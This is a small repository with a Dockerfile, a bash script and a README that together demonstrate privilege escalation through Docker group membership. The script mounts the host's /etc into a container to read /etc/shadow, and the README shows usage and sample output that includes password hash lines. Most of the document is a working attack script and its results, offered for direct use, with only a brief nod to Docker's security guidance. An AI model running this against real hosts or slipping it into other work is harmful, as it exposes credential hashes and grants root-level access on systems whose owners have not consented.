├── Dockerfile
├── docker-escalate.sh
└── README.md


/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM alpine
2 | 
3 | VOLUME /root
4 | 


--------------------------------------------------------------------------------
/docker-escalate.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | if [ $(id -u) -eq 0 ]; then
 4 |     echo "Already root"
 5 |     exit
 6 | fi
 7 | 
 8 | if groups $USER |grep -q docker; then
 9 |     echo "User $USER in docker group, attacking..."
10 |     docker run -v /etc:/root krustyhack/docker-privesc cat /root/shadow
11 | else
12 |     echo "User $USER not in docker group, abort."
13 | fi
14 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # docker-privilege-escalation
 2 | A docker example for privilege escalation
 3 | 
 4 | ## How ?
 5 | 
 6 | If the user using docker is in the group docker he can run container with host mounted volumes. In this case, the user can run a light container with /etc mounted in and then get root access in the container.
 7 | 
 8 | The following example show how to read /etc/shadow from host with the help of a docker container and a user in group docker.
 9 | 
10 | But as explained in the Docker security documentation: ```only trusted users should be allowed to control your Docker daemon```.
11 | 
12 | ## Usage
13 | 
14 | * ``` chmod +x docker-escalate.sh```
15 | * ``` ./docker-escalate.sh```
16 | 
17 | 
18 | ### Success
19 | ```
20 | user@test:$ ./docker-escalate.sh 
21 | User user in docker group, attacking...
22 | root:$6$QHOCMH......................kh4A1Dx6sASl/BM0L/:16514:0:99999:7:::
23 | daemon:*:16514:0:99999:7:::
24 | bin:*:16514:0:99999:7:::
25 | sys:*:16514:0:99999:7:::
26 | sync:*:16514:0:99999:7:::
27 | games:*:16514:0:99999:7:::
28 | man:*:16514:0:99999:7:::
29 | lp:*:16514:0:99999:7:::
30 | mail:*:16514:0:99999:7:::
31 | news:*:16514:0:99999:7:::
32 | uucp:*:16514:0:99999:7:::
33 | proxy:*:16514:0:99999:7:::
34 | www-data:*:16514:0:99999:7:::
35 | backup:*:16514:0:99999:7:::
36 | list:*:16514:0:99999:7:::
37 | irc:*:16514:0:99999:7:::
38 | gnats:*:16514:0:99999:7:::
39 | nobody:*:16514:0:99999:7:::
40 | libuuid:!:16514:0:99999:7:::
41 | syslog:*:16514:0:99999:7:::
42 | user:$6$QHOCMHim$f9FEVV7/.TnxLsT5Wt14DTE5Qo8iCwPFjGAyYUH4vZQUawOKrlcXffrl2.ZLmA.fubLXkh4A1Dx6sASl/BM0L/:16540:0:99999:7:::
43 | ```
44 | 
45 | ### Fail
46 | 
47 | ```
48 | user@user:$ ./docker-escalate.sh 
49 | User test not in docker group, abort.
50 | ```


--------------------------------------------------------------------------------